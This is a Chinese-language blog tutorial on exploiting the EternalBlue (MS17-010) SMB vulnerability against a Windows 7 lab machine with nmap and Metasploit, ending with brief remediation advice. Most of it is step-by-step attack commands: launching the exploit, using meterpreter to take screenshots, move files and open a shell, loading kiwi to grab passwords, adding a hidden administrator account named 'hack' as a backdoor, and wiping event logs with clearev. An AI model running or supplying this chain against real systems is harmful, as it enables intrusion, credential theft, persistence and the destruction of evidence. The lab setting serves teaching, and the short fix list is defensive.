永恒之蓝漏洞利用攻击以及修复方法

  • 靶机:Windows 7(有的版本有补丁)
  • 攻击机:Kali 2021
  • 首先保证可以互相ping 通
  • 32位系统进去控制台会蓝屏

漏洞利用

用nmap的漏洞扫描模式,扫描过程按上下方向键即可查看扫描进度,这可能需要一点时间。

nmap --script=vuln window7ip

可以发现,靶机上扫到了4个漏洞,其中包括了永恒之蓝。

如果系统版本较高就像这样,没有ms17 -10

打开metasploit,今天怎么是个心形,作为单身狗我哭了。。。

msfconsole


搜索ms17-010相关模块,可以看到一共找到了6个不同的模块

search ms17-010


加载扫描第一个模块

use auxiliary/scanner/smb/smb_ms17_010

查看配置选项

show options


 set rhosts显示远程主机未配置,配置目标主机。

   set rhosts window7

rhosts => 192.168.178.128

再次扫描漏洞,确认靶机存在MS17-010漏洞。

exploit

在这里插入图片描述
使用永恒之蓝攻击模块:exploit/windows/smb/ms17_010_eternalblue
并设置攻击载荷:

set payload

在这里插入图片描述
查看选项并设置rhosts:

set rhosts 192.168.178.128

输入exploit开始攻击。

出现meterpreter >就说明已经成功了,Meterpreter 是 Metasploit 的一个扩展模块,可以调用 Metasploit 的一些功能,对目标系统进行更深入的渗透,如获取屏幕、上传/下载文件、创建持久后门等。

演示几个功能

  1. 捕获屏幕
 meterpreter > screenshot


  1. 上传/下载文件
meterpreter > upload hello.txt c://

在这里插入图片描述

meterpreter > download d://1.txt
meterpreter > run vnc 

获取cmd

meterpreter > shell
  1. 获取用户密码
meterpreter > load kiwi 
Loading extension kiwi...Success. 

进行后门植入(创建新的管理员账户)

      net user hack 123456 /add        //在windows 7上创建一个hack的用户,以便下次访问

      net localgroup administrators hack /add     //将hack加入到windows 7的本地管理员组中,以便获得更大权限
 

记得清除日志(靶机的事件查看器记录了大量的事件,需要消除痕迹)

meterpreter > clearev




修复方法

受害版本参照:点我进入查看

  • 关闭445端口。
  • 打开防火墙,安装安全软件。
  • 安装对应补丁。
  • 0
    点赞
  • 36
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
永恒之蓝漏洞(EternalBlue)是一种影响微软Windows操作系统的漏洞,它被用于进行网络蠕虫攻击和远程代码执行。以下是一些防范永恒之蓝漏洞的建议措施: 1. 及时打补丁:安装并定期更新微软发布的安全补丁,包括修复永恒之蓝漏洞的相关补丁。确保操作系统和其他软件都是最新版本,以修复已知漏洞。 2. 使用防火墙:配置网络防火墙以限制对服务器和内部网络的访问,并阻止恶意流量进入网络。防火墙可以过滤掉可能包含永恒之蓝攻击代码的流量。 3. 强化访问控制:使用强密码策略,限制远程访问,禁用不必要的服务和端口,实施多因素身份验证等,以减少攻击者利用永恒之蓝漏洞进行远程攻击的可能性。 4. 网络隔离:将关键系统和敏感数据放置在独立的网络段中,并使用网络隔离技术(如虚拟局域网/VLAN)分隔网络,以减少受到攻击的风险。 5. 安全监控:使用入侵检测系统(IDS)和入侵防御系统(IPS)来监控网络流量,并检测和阻止潜在的永恒之蓝攻击行为。 6. 应用白名单和黑名单:限制可执行文件的运行,只允许运行经过授权的可信程序,以防止恶意软件利用永恒之蓝漏洞进行远程执行。 7. 安全培训和意识:对服务器管理员和用户进行安全培训,提高其对网络安全风险和最佳实践的认识。 综合采取这些措施可以帮助减少永恒之蓝漏洞对系统的威胁。然而,没有绝对安全的系统,持续的安全更新和监控仍然非常重要。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值